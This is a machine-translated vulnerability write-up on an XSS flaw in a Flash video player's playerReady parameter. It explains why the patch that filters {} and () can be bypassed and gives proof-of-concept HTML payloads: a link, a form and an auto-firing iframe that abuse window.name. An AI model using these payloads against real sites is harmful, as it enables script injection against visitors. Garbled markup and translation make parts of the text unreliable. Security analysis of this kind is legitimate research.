Alibaba PLAYER 5 latest swf xss 0day analysis and POC Improvement

Especially Thx's idea :)

On the 16th, foreigners announced an unrepaired XSS 0-day release of Alibaba player. Player player is the most widely used flash player in the world, especially for many online love action movie websites abroad. Prior to this, Alibaba player experienced an XSS vulnerability with a wide impact.

According to a foreigner's description, this problem mainly occurs because the previous XSS vulnerability was not completely fixed, resulting in bypass reuse. The original problem isPlayerReadyThe parameter values are not filtered and enter directly.ExternalInterface. callAs a result, arbitrary JS code can be executed. After two official minor version patches, the final solution to this problem is to disable the {} and () symbols in the playerReady parameter values. This simple fix can be bypassed.

POC in the original article:

 

Example 1:

This example simply uses javascript: alert (1) as the value in window. name

Target = "javascript: alert (1)" href = "http://player.longtailvideo.com/player.swf? PlayerReady = document. location = window. name % 2b % 27 // % 27% 2b "> Click Me

 

Two features are used here, one is the framename of the a tag target, and the other is the cross-domain transfer feature of window. name. Among other target attributes that can be used in tag a, we usually use the following four values: _ blank, _ parent, _ self, and _ top. framename is rarely used. Framename is equivalent to specifying a window name and redirecting documents to the window for processing. Therefore, framename is equivalent to window. name, this POC uses javascript: alert (1) pseudo protocol as framename in the tag, and the vulnerability URL specifies location as window. name executes our JS Code. We can also use form and other tags that support the target attribute to construct the poc:
Action = "http://player.longtailvideo.com/player.swf? PlayerReady = document. location = window. name % 2b % 27 // % 27% 2b "method =" post "target =" javascript: alert (1) ">
Type = "submit"> Logon

However, this POC requires interaction, which is quite tricky. In fact, we can improve it to a form that does not require user interaction. Since framename is the name of the window, we can directly use iframe and specify the name as javascript: alert (1 ).

<Iframe <span = ""> name = "javascript: alert (document. domain )"
Src = "http://player.longtailvideo.com/player.swf? PlayerReady = document. location = window. name % 2b % 27 // % 27% 2b "> </iframe <>

<Iframe <span = "">

 

So that our POC can be triggered automatically :)

</Iframe <>